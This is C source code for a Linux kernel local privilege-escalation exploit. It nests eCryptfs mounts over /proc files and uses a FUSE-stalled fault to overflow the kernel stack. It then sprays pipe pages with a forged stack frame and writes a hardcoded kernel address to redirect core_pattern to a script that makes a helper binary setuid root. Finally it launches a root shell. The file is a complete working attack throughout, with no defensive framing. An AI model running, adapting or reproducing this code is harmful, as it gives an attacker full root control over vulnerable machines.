#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <err.h>
#include <sys/mman.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <unistd.h>
#include <stdint.h>
#include <keyutils.h>
#include <errno.h>
#include <ecryptfs.h>
#include <sys/eventfd.h>
#include <signal.h>
#include <string.h>
#include <stdlib.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <stdbool.h>
#include <assert.h>
#include <sys/wait.h>
#include <sched.h>
#include <sys/resource.h>
#include <dirent.h>

void *map_fuse_sleeper_area(int len) {
  char cmd[500];
  sprintf(cmd, "mkdir -p /tmp/fuse_mount && ./hello /tmp/fuse_mount %d", len);
  if (system(cmd))
    errx(1, "system() failed");
  int fuse_fd = open("/tmp/fuse_mount/hello", O_RDWR);
  if (fuse_fd == -1)
    err(1, "unable to open FUSE fd");
  void *sleeper_area = mmap(NULL, len, PROT_READ, MAP_PRIVATE, fuse_fd, 0);
  if (sleeper_area == MAP_FAILED)
    err(1, "unable to mmap FUSE fd");
  return sleeper_area;
}

void set_env_and_arg_area(char *ptr, size_t size) {
  // ensure that reading from argv works by putting a zero at the end.
  char *argv_fixup_page = (void*)((unsigned long)(ptr + size + 0xfff) & ~0xfff);
  if (mmap(argv_fixup_page, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0) != argv_fixup_page)
    err(1, "mmap(argv_fixup_page)");

  struct prctl_mm_map mm_map = {
    .start_code = 0x400000,
    .end_code = 0x400001,
    .start_data = 0x400002,
    .end_data = 0x400003,
    .start_brk = 0x400004,
    .brk = (uint64_t)sbrk(0),
    .start_stack = 0x100000000,
    .arg_start = (uint64_t)ptr,
    .arg_end = (uint64_t)(argv_fixup_page + 1),
    .env_start = (uint64_t)ptr,
    .env_end = (uint64_t)ptr + size,
    .auxv_size = 0,
    .exe_fd = -1
  };
  if (prctl(PR_SET_MM, PR_SET_MM_MAP, &mm_map, sizeof(mm_map), 0))
    err(1, "PR_SET_MM_MAP");
}

void write_file(char *dir, char *name, char *data) {
  char path[500];
  sprintf(path, "%s/%s", dir, name);
  int fd = open(path, O_WRONLY|O_TRUNC|O_CREAT, 0600);
  if (fd == -1)
    err(1, "opening %s failed", path);
  if (write(fd, data, strlen(data)) != strlen(data))
    errx(1, "write to %s failed", path);
  close(fd);
}

size_t read_file(char *dir, char *name, char **data) {
  char path[500];
  sprintf(path, "%s/%s", dir, name);
  int fd = open(path, O_RDONLY);
  if (fd == -1)
    err(1, "open \"%s\"", path);
  struct stat st;
  if (fstat(fd, &st))
    err(1, "fstat");
  *data = malloc(st.st_size);
  if (!*data)
    err(1, "malloc");
  if (read(fd, *data, st.st_size) != st.st_size)
    errx(1, "read_file read");
  close(fd);
  return st.st_size;
}

char *mmap_file(char *path, size_t len) {
  int fd = open(path, O_RDONLY);
  if (fd == -1)
    err(1, "open \"%s\"", path);
  errno = 0;
  char *ptr = mmap(NULL, len, PROT_READ, MAP_PRIVATE, fd, 0);
  if (ptr == MAP_FAILED)
    err(1, "mmap");
  close(fd);
  return ptr;
}

void copy_file(char *srcdir, char *srcname, char *dstdir, char *dstname) {
  char cmd[1000];
  sprintf(cmd, "cp '%s/%s' '%s/%s'", srcdir, srcname, dstdir, dstname);
  if (system(cmd))
    errx(1, "system(\"%s\")", cmd);
}

void eventfd_wait(int fd) {
  uint64_t ctr;
  ssize_t res = read(fd, &ctr, 8);
  if (res != 8)
    err(1, "eventfd_wait");
}

void eventfd_send(int fd) {
  uint64_t ctr = 1;
  ssize_t res = write(fd, &ctr, 8);
  if (res != 8)
    err(1, "eventfd_send");
}

#define MATROSKA_DEPTH 14

pid_t children[MATROSKA_DEPTH];
int sync_eventfds_to_child[MATROSKA_DEPTH];
int sync_eventfds_from_child[MATROSKA_DEPTH];

void sendfd(int sock, int fd) {
  int len = sizeof(struct cmsghdr) + sizeof(int);
  struct cmsghdr *hdr = alloca(len);
  *hdr = (struct cmsghdr) {
    .cmsg_len = len,
    .cmsg_level = SOL_SOCKET,
    .cmsg_type = SCM_RIGHTS
  };
  *(int*)CMSG_DATA(hdr) = fd;
  struct msghdr msg = {
    .msg_control = hdr,
    .msg_controllen = len
  };
  if (sendmsg(sock, &msg, 0) < 0)
    err(1, "sendmsg");
}

int recvfd(int sock) {
  int len = sizeof(struct cmsghdr) + sizeof(int);
  struct cmsghdr *hdr = alloca(len);
  struct msghdr msg = {
    .msg_control = hdr,
    .msg_controllen = len
  };
  if (recvmsg(sock, &msg, 0) < 0)
    err(1, "recvmsg");
  if (hdr->cmsg_len != len || hdr->cmsg_level != SOL_SOCKET
      || hdr->cmsg_type != SCM_RIGHTS)
    errx(1, "got bad message");
  return *(int*)CMSG_DATA(hdr);
}

int recurser_going_to_recurse_notifier_fd;

int recurser_main(void *dummyptr) {
  // first, set up an ecryptfs for matroska creation
  char sig[ECRYPTFS_SIG_SIZE_HEX + 1];
  char salt[ECRYPTFS_SALT_SIZE] = {0};
  if (ecryptfs_add_passphrase_key_to_keyring(sig, "foobar", salt) < 0)
    errx(1, "unable to add key to keyring");
  char ecryptfs_dir[300];
  sprintf(ecryptfs_dir, "%s/.ecryptfs", getenv("HOME"));
  if (mkdir(ecryptfs_dir, 0700) && errno != EEXIST)
    err(1, "mkdir");
  /* single line; no filename encryption key */
  write_file(ecryptfs_dir, "exploit.sig", sig);
  if (mkdir("/tmp/exploit_mount", 0700) && errno != EEXIST)
    err(1, "mkdir in /tmp");
  if (mkdir("/tmp/exploit_lower", 0700) && errno != EEXIST)
    err(1, "mkdir in /tmp");
  char conf_data[500];
  sprintf(conf_data, "/tmp/exploit_lower /tmp/exploit_mount ecryptfs none 0 0\n");
  write_file(ecryptfs_dir, "exploit.conf", conf_data);
  if (system("/sbin/mount.ecryptfs_private exploit"))
    errx(1, "mount1 failed");

  // now, create the matroskas
  char MATROSKA_ZERO[50 * 1024]; /* 50KiB, should be sufficient to prevent caching */
  memset(MATROSKA_ZERO, 0x42, sizeof(MATROSKA_ZERO));
  write_file("/tmp/exploit_mount", "1", MATROSKA_ZERO);
  sync();
  for (int i=1; i<MATROSKA_DEPTH; i++) {
    char i_str[10];
    char nexti_str[10];
    sprintf(i_str, "%d", i);
    sprintf(nexti_str, "%d", i+1);
    copy_file("/tmp/exploit_lower", i_str, "/tmp/exploit_mount", nexti_str);
    sync();
  }

  // create threads
  for (int i=0; i<MATROSKA_DEPTH; i++) {
    sync_eventfds_to_child[i] = eventfd(0, EFD_SEMAPHORE);
    if (sync_eventfds_to_child[i] == -1)
      err(1, "eventfd");
    sync_eventfds_from_child[i] = eventfd(0, EFD_SEMAPHORE);
    if (sync_eventfds_from_child[i] == -1)
      err(1, "eventfd");
  }
  for (int i=0; i<MATROSKA_DEPTH; i++) {
    pid_t child = fork();
    if (child == -1)
      err(1, "fork");
    if (child == 0) {
      char filenumstr[10];
      sprintf(filenumstr, "%d", i+1);
      char *direct_matroska;
      size_t direct_matroska_len = read_file("/tmp/exploit_lower", filenumstr, &direct_matroska);
      set_env_and_arg_area(direct_matroska, direct_matroska_len);

      // Note: This yields control to the main process and only resumes after all the children
      // have passed this point!
      eventfd_send(sync_eventfds_from_child[i]);
      eventfd_wait(sync_eventfds_to_child[i]);

      if (i == MATROSKA_DEPTH - 1) {
        // replace memory with FUSE sleeping-pagefault area
        // note: following ecryptfs reads will return garbage
        set_env_and_arg_area(map_fuse_sleeper_area(direct_matroska_len), direct_matroska_len);
      } else {
        // map lower environ/cmdline as environ+cmdline
        char new_env_path[300];
        sprintf(new_env_path, "/tmp/exploit_mounts/%d/%s", i+1, (i < 10) ? "environ" : "cmdline");
        char *new_env = mmap_file(new_env_path, direct_matroska_len);
        set_env_and_arg_area(new_env, direct_matroska_len);
      }

      eventfd_send(sync_eventfds_from_child[i]);
      eventfd_wait(sync_eventfds_to_child[i]);

      exit(0);
    }
    eventfd_wait(sync_eventfds_from_child[i]);
    children[i] = child;
  }

  // set up mounts
  if (mkdir("/tmp/exploit_mounts", 0700) && errno != EEXIST)
    err(1, "mkdir in /tmp");
  for (int i=0; i<MATROSKA_DEPTH; i++) {
    char exploit_mount_subpath[300];
    sprintf(exploit_mount_subpath, "/tmp/exploit_mounts/%d", i);
    if (mkdir(exploit_mount_subpath, 0700) && errno != EEXIST)
      err(1, "mkdir in /tmp");

    // note: the umount helper removed the key, reinsert it
    if (ecryptfs_add_passphrase_key_to_keyring(sig, "foobar", salt) < 0)
      errx(1, "unable to add key to keyring");
    sprintf(conf_data, "/proc/%d /tmp/exploit_mounts/%d ecryptfs none 0 0\n", (int)children[i], i);
    write_file(ecryptfs_dir, "exploit.conf", conf_data);
    if (system("/sbin/mount.ecryptfs_private exploit"))
      errx(1, "system failed");
  }

  // map lower environ
  char *top_map = mmap_file("/tmp/exploit_mounts/0/environ", sizeof(MATROSKA_ZERO));
  for (int i=0; i<MATROSKA_DEPTH; i++) {
      eventfd_send(sync_eventfds_to_child[i]);
      eventfd_wait(sync_eventfds_from_child[i]);
  }

  puts("fault chain set up, faulting now");


  /* can't unshare on the current thread - we're multithreaded. sooo... */
  int fd_transfer_socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, fd_transfer_socks))
    err(1, "socketpair");
  pid_t newns_child = fork();
  if (newns_child == -1)
    err(1, "fork");
  if (newns_child == 0) {
    if (unshare(CLONE_NEWUSER))
      err(1, "unshare userns");
    int target_fd = open("/proc/self/uid_map", O_WRONLY);
    if (target_fd == -1)
      err(1, "open uid_map");
    sendfd(fd_transfer_socks[0], target_fd);
    exit(0);
  }
  int target_fd = recvfd(fd_transfer_socks[1]);

  eventfd_send(recurser_going_to_recurse_notifier_fd);

  write(target_fd, top_map + sizeof(MATROSKA_ZERO) - 8, 8);

  puts("still alive in original context? that's really weird. something failed.");
  return 0;
}

int pipes_per_process;

char post_corruption_user_stack[8000000];

void kernel_write(unsigned long addr, char *buf, size_t len) {
  int pipefds[2];
  if (pipe(pipefds))
    err(1, "pipe");
  if (write(pipefds[1], buf, len) != len)
    errx(1, "pipe write");
  close(pipefds[1]);
  if (read(pipefds[0], (char*)addr, len) != len)
    errx(1, "pipe read to kernelspace");
  close(pipefds[0]);
}

char post_corruption_env_cmdline[] = "EXPLOIT POST-CORRUPTION";

void post_corruption_user_code(void) {
  int status;
  puts("post-corruption code is alive!");

  /* kill all our children to prevent their environ/cmdline from messing up the system */
  for (int i=0; i<MATROSKA_DEPTH; i++) {
    if (kill(children[i], SIGKILL))
      err(1, "kill failed");
    waitpid(children[i], &status, 0);
  }
  puts("children should be dead");

  char *core_handler = "|/tmp/crash_to_root";
  kernel_write(0xffffffff81e87a60, core_handler, strlen(core_handler)+1);

  puts("coredump handler set. recurser exiting.");
  exit(0);

  /* must not return! there is no stackframe above. */
}

unsigned long new_stack[] = {
  0xffffffff818252f2, /* return pointer of syscall handler */
  0x1515151515151515, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, /* 16 useless registers */
  (unsigned long) post_corruption_user_code, /* user RIP */
  0x33, /* user CS */
  0x246, /* EFLAGS: most importantly, turn interrupts on */
  (unsigned long) (post_corruption_user_stack + sizeof(post_corruption_user_stack)), /* user RSP */
  0x2b /* user SS */
};

void spammer(void) {
  int write_fds[pipes_per_process];

  prctl(PR_SET_PDEATHSIG, SIGKILL);

  /* first, prepare empty pipes */
  for (int i=0; i<pipes_per_process; i++) {
    int fds[2];
    if (pipe(fds))
      err(1, "pipe");
    write_fds[i] = fds[1];
  }

  raise(SIGSTOP);

  /*
   * on SIGCONT, write data to each pipe, with the following purposes:
   *  - causing allocation of one page per pipe
   *  - marking those pages so they're recognizable in gdb
   *  - move the write pointer to the offset of the first return pointer,
   *    to avoid clobbering stuff in front of it later
   */
  char pipe_data[0xcb0] = "#~#~";
  for (int i=0; i<pipes_per_process; i++) {
    errno = 0;
    if (write(write_fds[i], pipe_data, sizeof(pipe_data)) != sizeof(pipe_data))
      err(1, "write");
  }

  raise(SIGSTOP);

  /*
   * At this point, the recurser's RSP should point into one of the pipe pages.
   * Spray all of them with our new stackframe.
   */
  assert(sizeof(pipe_data) + sizeof(new_stack) < 0x1000);
  for (int i=0; i<pipes_per_process; i++) {
    errno = 0;
    if (write(write_fds[i], new_stack, sizeof(new_stack)) != sizeof(new_stack))
      err(1, "write");
  }

  raise(SIGSTOP);

  exit(0);
}

char recurser_stack[8000000];

// basically `killall -9 hello`, but guaranteed to not access cmdline
void kill_all_fuse_and_helpers(void) {
  if (chdir("/proc"))
    err(1, "unable to chdir into /proc");
  DIR *d = opendir(".");
  if (!d)
    err(1, "opendir");
  struct dirent *dent;
  while ((dent = readdir(d)) != NULL) {
    if (dent->d_name[0] < '0' || dent->d_name[0] > '9')
      continue;
    if (chdir(dent->d_name))
      continue;
    char comm[20];
    int comm_fd = open("comm", O_RDONLY);
    if (comm_fd == -1)
      goto back_out;
    ssize_t res = read(comm_fd, comm, 19);
    if (res < 0)
      comm[0] = 0;
    else
      comm[res] = 0;
    close(comm_fd);
    if (strstr(comm, "hello") == comm) {
      int kill_target = atoi(dent->d_name);
      printf("killing %d\n", kill_target);
      if (kill(kill_target, SIGKILL))
        perror("kill");
    }
back_out:
    if (chdir(".."))
      err(1, "chdir");
  }
}

int main(void) {
  int status;

  if (system("cp suidhelper /tmp/"))
    errx(1, "unable to copy suidhelper to /tmp - maybe you're not running me from the exploit directory?");

  write_file("/tmp", "crash_to_root", "#!/bin/bash\nchown root:root /tmp/suidhelper\nchmod 06755 /tmp/suidhelper\n");
  if (system("chmod +x /tmp/crash_to_root"))
    errx(1, "chmodding /tmp/crash_to_root executable");

  recurser_going_to_recurse_notifier_fd = eventfd(0, EFD_SEMAPHORE);
    if (recurser_going_to_recurse_notifier_fd == -1)
      err(1, "eventfd");

  // raise RLIMIT_NOFILE as high as we can
  struct rlimit rlim;
  if (getrlimit(RLIMIT_NOFILE, &rlim))
    err(1, "getrlimit");
  rlim.rlim_cur = rlim.rlim_max;
  if (setrlimit(RLIMIT_NOFILE, &rlim))
    err(1, "setrlimit");
  pipes_per_process = (rlim.rlim_max - 10) / 2;

  // prepare a bunch of children ready to spam
  int spammer_count = 300000 / pipes_per_process; /* must be well below ((/proc/sys/fs/file-max) / 2) */
  pid_t spammers[spammer_count];
  for (int i=0; i<spammer_count; i++) {
    spammers[i] = fork();
    if (spammers[i] == -1)
      err(1, "fork");
    if (spammers[i] == 0)
      spammer();
    if (waitpid(spammers[i], &status, WUNTRACED) != spammers[i])
      err(1, "first waitpid spammer");
  }
  puts("all spammers ready");

  pid_t recurser_parent = fork();
  if (recurser_parent == -1)
    err(1, "fork");
  if (recurser_parent == 0) {
    raise(SIGSTOP);
    usleep(100);
    /* reduce the memory allocations for this fork as much as possible */
    int child = clone(recurser_main, recurser_stack + sizeof(recurser_stack), CLONE_FILES | CLONE_FS | CLONE_IO | CLONE_SIGHAND | CLONE_SYSVSEM | CLONE_THREAD | CLONE_VM, NULL);
    if (child == -1)
      err(1, "clone");
    syscall(__NR_exit, 0); /* not exit_group! */
  }
  if (waitpid(recurser_parent, &status, WUNTRACED) != recurser_parent)
    err(1, "waitpid recurser_parent");
  puts("recurser parent ready");

  for (int i=0; i<spammer_count; i++) {
    kill(spammers[i], SIGCONT);
    if (i == spammer_count / 2) {
      kill(recurser_parent, SIGCONT);
    }
    if (waitpid(spammers[i], &status, WUNTRACED) != spammers[i])
      err(1, "second waitpid spammer");
  }
  puts("spam over");

  eventfd_wait(recurser_going_to_recurse_notifier_fd);
  /*
   * We have time, and we really don't want to fail at this point just because we raced with
   * the recurser.
   */
  sleep(2);

  // now spray the stackframes
  puts("writing stackframes");
  for (int i=0; i<spammer_count; i++) {
    kill(spammers[i], SIGCONT);
    if (waitpid(spammers[i], &status, WUNTRACED) != spammers[i])
      err(1, "waitpid spammer");
  }
  puts("stackframes written");

  // ... aaand resume and hope it doesn't die horribly because we missed?
  kill_all_fuse_and_helpers();

  if (getrlimit(RLIMIT_CORE, &rlim))
    err(1, "getrlimit");
  rlim.rlim_cur = rlim.rlim_max;
  if (setrlimit(RLIMIT_CORE, &rlim))
    err(1, "setrlimit");

  while (1) {
    int coredump_fd = open("/proc/sys/kernel/core_pattern", O_RDONLY);
    if (coredump_fd == -1)
      err(1, "open core_pattern");
    char buf[1000];
    ssize_t read_res = read(coredump_fd, buf, sizeof(buf)-1);
    if (read_res == -1)
      err(1, "read from core_pattern");
    close(coredump_fd);
    if (strstr(buf, "|/tmp/crash_to_root") == buf)
      break;
  }
  pid_t dumper_child = fork();
  if (dumper_child == -1)
    err(1, "fork dumper_child");
  if (dumper_child == 0) {
    puts("going to crash now");
    raise(SIGSEGV);
  }

  struct stat helperstat;
  while (1) {
    if (stat("/tmp/suidhelper", &helperstat))
      err(1, "stat suidhelper");
    if (helperstat.st_mode & S_ISUID)
      break;
    sleep(1);
  }
  fputs("suid file detected, launching rootshell...\n", stderr);
  execl("/tmp/suidhelper", "suidhelper", NULL);
  err(1, "execl suidhelper");
}
